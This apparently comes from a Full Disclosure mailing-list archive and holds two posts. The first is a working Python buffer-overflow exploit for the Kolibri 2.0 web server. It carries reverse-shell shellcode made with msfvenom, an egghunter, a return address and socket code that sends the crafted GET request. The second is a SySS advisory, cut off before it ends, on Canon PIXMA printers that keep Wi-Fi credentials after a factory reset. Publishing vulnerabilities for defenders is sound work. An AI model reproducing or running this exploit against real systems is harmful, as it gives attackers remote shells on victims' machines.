[FD] Kolibri GET request buffer Overflow [Stack Egghunter]
#!/usr/bin/python3
# Exploit Title: Kolibri GET request buffer Overflow [Stack Egghunter]
# Date: 2 Augst 2023
# Exploit Author: Mahmoud NourEldin @Engacker
# Vendor App:
https://www.exploit-db.com/apps/4d4e15b98e105facf94e4fd6a1f9eb78-Kolibri-2.0-win.zip
# Version: Kolibri 2.0
# Tested on: Windows 10
# Description:
# For the first time making the egghunter jumping to the begging of the
stack
import socket, time, sys, os
if len(sys.argv) != 3:
print(f"[*] Usage: {sys.argv[0]} \n[*] Exploit created
by Mahmoud NourEldin\n[*] https://www.linkedin.com/in/tamatahyt;)
sys.exit(0)
host = sys.argv[1]
port = int(sys.argv[2])
try:
#[BadChars] \x00\x0a\x0d\x20\x3d\x3f
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.101 LPORT=1337
EXITFUNC=thread -f py –e x86/shikata_ga_nai -b "\x00\x0a\x0d\x20\x3d\x3f"
buf = b"w00tw00t"
buf += b"\xba\xc7\xe5\x34\xdd\xd9\xe8\xd9\x74\x24\xf4\x58"
buf += b"\x33\xc9\xb1\x52\x83\xe8\xfc\x31\x50\x0e\x03\x97"
buf += b"\xeb\xd6\x28\xeb\x1c\x94\xd3\x13\xdd\xf9\x5a\xf6"
buf += b"\xec\x39\x38\x73\x5e\x8a\x4a\xd1\x53\x61\x1e\xc1"
buf += b"\xe0\x07\xb7\xe6\x41\xad\xe1\xc9\x52\x9e\xd2\x48"
buf += b"\xd1\xdd\x06\xaa\xe8\x2d\x5b\xab\x2d\x53\x96\xf9"
buf += b"\xe6\x1f\x05\xed\x83\x6a\x96\x86\xd8\x7b\x9e\x7b"
buf += b"\xa8\x7a\x8f\x2a\xa2\x24\x0f\xcd\x67\x5d\x06\xd5"
buf += b"\x64\x58\xd0\x6e\x5e\x16\xe3\xa6\xae\xd7\x48\x87"
buf += b"\x1e\x2a\x90\xc0\x99\xd5\xe7\x38\xda\x68\xf0\xff"
buf += b"\xa0\xb6\x75\x1b\x02\x3c\x2d\xc7\xb2\x91\xa8\x8c"
buf += b"\xb9\x5e\xbe\xca\xdd\x61\x13\x61\xd9\xea\x92\xa5"
buf += b"\x6b\xa8\xb0\x61\x37\x6a\xd8\x30\x9d\xdd\xe5\x22"
buf += b"\x7e\x81\x43\x29\x93\xd6\xf9\x70\xfc\x1b\x30\x8a"
buf += b"\xfc\x33\x43\xf9\xce\x9c\xff\x95\x62\x54\x26\x62"
buf += b"\x84\x4f\x9e\xfc\x7b\x70\xdf\xd5\xbf\x24\x8f\x4d"
buf += b"\x69\x45\x44\x8d\x96\x90\xcb\xdd\x38\x4b\xac\x8d"
buf += b"\xf8\x3b\x44\xc7\xf6\x64\x74\xe8\xdc\x0c\x1f\x13"
buf += b"\xb7\xf2\x48\x23\x22\x9b\x8a\x53\xa9\x62\x02\xb5"
buf += b"\xdb\x84\x42\x6e\x74\x3c\xcf\xe4\xe5\xc1\xc5\x81"
buf += b"\x26\x49\xea\x76\xe8\xba\x87\x64\x9d\x4a\xd2\xd6"
buf += b"\x08\x54\xc8\x7e\xd6\xc7\x97\x7e\x91\xfb\x0f\x29"
buf += b"\xf6\xca\x59\xbf\xea\x75\xf0\xdd\xf6\xe0\x3b\x65"
buf += b"\x2d\xd1\xc2\x64\xa0\x6d\xe1\x76\x7c\x6d\xad\x22"
buf += b"\xd0\x38\x7b\x9c\x96\x92\xcd\x76\x41\x48\x84\x1e"
buf += b"\x14\xa2\x17\x58\x19\xef\xe1\x84\xa8\x46\xb4\xbb"
buf += b"\x05\x0f\x30\xc4\x7b\xaf\xbf\x1f\x38\xcf\x5d\xb5"
buf += b"\x35\x78\xf8\x5c\xf4\xe5\xfb\x8b\x3b\x10\x78\x39"
buf += b"\xc4\xe7\x60\x48\xc1\xac\x26\xa1\xbb\xbd\xc2\xc5"
buf += b"\x68\xbd\xc6"
egghunter =
b"\x33\xd2\x66\x81\xca\xff\x0f\x33\xdb\x42\x53\x53\x52\x53\x53\x53"
egghunter +=
b"\x6a\x29\x58\xb3\xc0\x64\xff\x13\x83\xc4\x0c\x5a\x83\xc4\x08\x3c"
egghunter +=
b"\x05\x74\xdf\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xda\xaf\x75\xd7"
egghunter += b"\xff\xe7"
eip = b"\x42\x24\x01\x10"#0x10012442 jmp esp
'''
payload length is: 800byte
EIP overwritten in 516 place which make a jmp to ESP
ESP include the egghunter and number of
Egghunter searching for w00tw00t+shellcode which exist in the first
request [buf]
Others just for place
'''
payload = b"\x90"*(515-len(buf))+ buf + eip + egghunter +
(268-len(egghunter)) *b"C"
#The request of the server
request = b""
request += b"GET /"+payload+b" HTTP/1.1\r\n"
request += b"Host: 192.168.56.102:8080\r\n\r\n"
#Connecting to the server
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print(f"[*]Sending The Evil Paylod...\nSee your reverse shell")
s.connect((host, port))
s.send(request)
s.close()
print("[x]Done")
#if can't connect
except socket.error:
print("Could not connect!\n[*]Is IP correct? Is Port correct?Can you ping
the machine?")
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] [SYSS-2023-011]: Canon PIXMA TR4550 and other inkjet printer models - Insufficient or Incomplete Data Removal, within Hardware Component (CWE-1301)
Advisory ID: SYSS-2023-011 Product: PIXMA TR4550 Manufacturer: Canon Affected Version(s): 1.020 / 1.080 also affects many other Canon inkjet printer models[4] Tested Version(s): 1.020 / 1.080 Vulnerability Type:Insufficient or Incomplete Data Removal within Hardware Component (CWE-1301) Insufficiently Protected Credentials (CWE-522) Risk Level:Low Solution Status: Fixed Manufacturer Notification: 2023-04-06 Solution Date: 2023-07-31 Public Disclosure: 2023-08-03 CVE Reference: No CVE ID from Canon PSIRT Author of Advisory:Manuel Stotz, SySS GmbH Overview: The Canon PIXMA TR4550 is an entry-level 4-in-1 printer equipped with Wi-Fi connectivity. The manufacturer describes the product as follows (see [1]): "Ready to adapt to your smart home office environment, this efficient 4-In-One printer requires minimal space but gives maximum support to your projects. Whether scanning a document, copying an ID, faxing an invoice or printing posters, PIXMA TR4550 has the functionality to keep up with your business needs. Equipped with smart Wi-Fi connectivity to optimise management of functions and features, this front-loading 4-In-One printer is the compact solution that saves space, streamlines ink usage and brings productivity to the forefront." The unprotected storage of credentials and insufficient data removal during a factory reset allows sensitive data to be read out afterward. Vulnerability Details: The Canon PIXMA TR4550 stores sensitive data, such as the SSID and the Wi-Fi pre-shared key (PSK), unencrypted in its persistent storage (EEPROM). Resetting the product to factory settings (via 'Setup', 'Device settings', 'Reset setting' and 'All data') does not securely delete this sensitive information. Proof of Concept (PoC): SySS could successfully perform a proof-of-concept attack via the following steps: * Configure and establish a Wi-Fi connection. * Reset all data (Setup, Device settings, Reset setting, All data). * Disassemble the printer and locate the EEPROM on the PCB. * Create an EEPROM memory dump. * Search and locate the configured SSID and PSK in the memory dump. Solution: Canon PSIRT published its security advisory "Vulnerability Mitigation/Remediation for Inkjet Printers (Home and Office/Large Format)" (CP2023-003)[3] describing how sensitive information should be deleted concerning the affected printers[5]. Disclosure Timeline: 2023-04-06: Vulnerability reported to manufacturer 2023-04-12: Canon PSIRT creates ticket 2023-04-27: Update from Canon concerning ongoing analysis 2023-05-15: Canon confirms security issue 2023-05-23: Agreement on public disclosure date 2023-07-17: Canon PSIRT informs about scheduled publication of their security advisory 2023-07-31: Canon PSIRT publishes their security advisory "Vulnerability Mitigation/Remediation Format Inkjet Printers (Home and Office/Large Format)" (CP2023-003)[3] 2023-08-03: Public release of SySS security advisory References: [1] Product website for Canon PIXMA TR4550 https://www.canon-europe.com/support/consumer/products/printers/pixma/tr-series/pixma-tr4550.html [2] SySS Security Advisory SYSS-2023-011 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-011.txt [3] CP2023-003 Vulnerability Mitigation/Remediation for Inkjet Printers (Home and Office/Large Format) https://psirt.canon/advisory-information/cp2023-003/ [4] List of affected printers https://canon.a.bigcontent.io/v1/static/affected-models_20230731_d04c0d9895124b65acd21ca68357dcdc [5] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy Credits: This security vulnerability was found by Manuel Stotz of SySS GmbH. E-Mail: manuel.stotz (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Manuel_Stotz.asc Key Fingerprint: F051 5B74 7E70 193E 7F66 0133 E790 F68A BCE6 8C6D Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest
